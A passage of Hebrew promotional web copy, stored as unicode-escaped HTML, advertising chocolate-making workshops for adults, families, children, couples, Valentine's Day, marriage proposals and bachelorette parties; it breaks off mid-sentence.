\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd. <br \\/><br \\/>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05dc\\u05d1\\u05d3\\u05db\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05dc\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d4\\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd<\\/h2><p>\\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2\\u05d9\\u05dd \\u05d7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd. <br \\/>\\u05ea\\u05d7\\u05e9\\u05d1\\u05d5 \\u05e2\\u05dc \\u05d6\\u05d4 \\u05e8\\u05d2\\u05e2. \\u05de\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05db\\u05d9\\u05e3, \\u05de\\u05d4\\u05e0\\u05d4 \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e0\\u05d4 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e9\\u05d0\\u05d5\\u05ea\\u05d5 \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05db\\u05d9\\u05e3 \\u05d5\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e9\\u05de\\u05d7\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd?<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05e6\\u05d1\\u05d5\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d5\\u05ea \\u05d9\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e8\\u05d1\\u05d5\\u05ea \\u05d1\\u05d5\\u05d7\\u05e8\\u05d5\\u05ea \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea \\u05d0\\u05e6\\u05dc\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05d9\\u05e9\\u05e0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05d7\\u05d5\\u05d1\\u05d1\\u05d5\\u05ea \\u05d0\\u05d5\\u05db\\u05dc, \\u05e2\\u05dd \\u05d6\\u05d9\\u05e7\\u05d4 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7 \\u05d5\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5. <br \\/><br \\/>\\u05de\\u05e9\\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05e7\\u05e6\\u05ea \\u05e9\\u05d5\\u05e0\\u05d4 \\u05d5\\u05d0\\u05d7\\u05e8\\u05ea, \\u05d6\\u05de\\u05df \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d9\\u05d5\\u05e6\\u05d0\\u05ea \\u05d3\\u05d5\\u05e4\\u05df, \\u05d5\\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0, \\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d5\\u05dc\\u05e9\\u05de\\u05d5\\u05d7 \\u05d1\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d2\\u05df \\u05e2\\u05d3\\u05df \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h2><p>\\u05d9\\u05e9 \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05d8\\u05d1\\u05d7. \\u05d4\\u05dd \\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05dc\\u05e6\\u05d3 \\u05d4\\u05d4\\u05d5\\u05e8\\u05d9\\u05dd, \\u05dc\\u05e9\\u05d7\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05de\\u05d0\\u05ea\\u05d2\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e2\\u05e6\\u05de\\u05d0\\u05d9. \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05d4\\u05d1\\u05d4 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd. \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e9\\u05de\\u05ea\\u05e7\\u05e8\\u05d1\\u05ea, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05dc\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea, \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd<\\/h3><p>\\u05d1\\u05e0\\u05d9 \\u05d6\\u05d5\\u05d2 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05d9\\u05d7\\u05d3, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9 \\u05d1\\u05de\\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05e8\\u05d5\\u05d7\\u05d5\\u05ea \\u05de\\u05d5\\u05e9\\u05e7\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d3\\u05d0\\u05d9 \\u05d9\\u05de\\u05e6\\u05d0\\u05d5 \\u05e2\\u05e0\\u05d9\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea. <br \\/><br \\/>\\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d1\\u05e0\\u05d5\\u05d9\\u05d4 \\u05db\\u05da \\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h3><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea. <br \\/><br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><p>\\u00a0<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h3><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea 